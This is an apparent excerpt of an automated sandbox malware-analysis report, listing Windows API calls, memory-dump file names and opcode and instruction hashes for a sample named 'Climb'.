                                                                                                                                                                          • Instruction ID: 15ec1f923ca5ffc47cbe1685c7c400a3e7e537f0baf3745899d5f5c6ca5e3928
                                                                                                                                                                          • Opcode Fuzzy Hash: a069f5b28b19b7e7fb47bd7975974354204bec725a8d2955227816226d40d94d
                                                                                                                                                                          • Instruction Fuzzy Hash: 1EE06D70A003108FD330EF68E908742BFF8AB04300F008A5CE886C2291DBB4D485CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00AD39F0
                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00AD3A05
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Temp$FileNamePath
                                                                                                                                                                          • String ID: aut
                                                                                                                                                                          • API String ID: 3285503233-3010740371
                                                                                                                                                                          • Opcode ID: 897f8cf83e433bb965a66e2ded237ebf8cd9da1377fab05479cde42be647c0e1
                                                                                                                                                                          • Instruction ID: ad39ac1c8eb8952c1458bb43077a6cdc8e34692da63ff1d9e519ef02d5c5a857
                                                                                                                                                                          • Opcode Fuzzy Hash: 897f8cf83e433bb965a66e2ded237ebf8cd9da1377fab05479cde42be647c0e1
                                                                                                                                                                          • Instruction Fuzzy Hash: 5CD05B7154032467DB30D7D49C0DFDB7E6CDB45710F0001917A5591091DAB0D545C7D0
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AF2DC8
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AF2DDB
                                                                                                                                                                            • Part of subcall function 00ACF292: Sleep.KERNEL32 ref: 00ACF30A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                                          • Opcode ID: 0fe9179319a3ee6652855e607c5fa403dc040a5739db65b8b69491b4e10b5b13
                                                                                                                                                                          • Instruction ID: 6cdc74cb17e1617b9b6660b7c5c81f530dcc97d6ee4542db7e16c54520a9f2db
                                                                                                                                                                          • Opcode Fuzzy Hash: 0fe9179319a3ee6652855e607c5fa403dc040a5739db65b8b69491b4e10b5b13
                                                                                                                                                                          • Instruction Fuzzy Hash: E7D012353D5310BBE664F7F0AD0FFE67B559F50B10F1148757349AA1E0C9E46801C654
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AF2E08
                                                                                                                                                                          • PostMessageW.USER32(00000000), ref: 00AF2E0F
                                                                                                                                                                            • Part of subcall function 00ACF292: Sleep.KERNEL32 ref: 00ACF30A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                                          • Opcode ID: 75fd1612f24ba20f1f1065cfb6b46fe2c63ee1e444ac7df5c5905b6c9c9f4b14
                                                                                                                                                                          • Instruction ID: 63b195f5f4adfcdadc506a17b5ff94d6c96723808ce43114a9099db5b7a4c76b
                                                                                                                                                                          • Opcode Fuzzy Hash: 75fd1612f24ba20f1f1065cfb6b46fe2c63ee1e444ac7df5c5905b6c9c9f4b14
                                                                                                                                                                          • Instruction Fuzzy Hash: 0FD0A9313C13106BE264E3B0AC0BFE26A519B00B10F1008247209AA0E0C8A06801C648
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00A9C213
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00A9C221
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A9C27C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1717984340-0
                                                                                                                                                                          • Opcode ID: 77ed5111c5ee63751bd19e5851d71e5e93c341d550b130a9db070a97862db9c6
                                                                                                                                                                          • Instruction ID: 90eda623e15a2ab105ec936a9fb1ee5ffb65a01325bc611007f46f0e1f9e7467
                                                                                                                                                                          • Opcode Fuzzy Hash: 77ed5111c5ee63751bd19e5851d71e5e93c341d550b130a9db070a97862db9c6
                                                                                                                                                                          • Instruction Fuzzy Hash: B241B430700A06EFDF21AFE5C944BFA7BE5AF11730F244269E855AB1A1EB308D01C760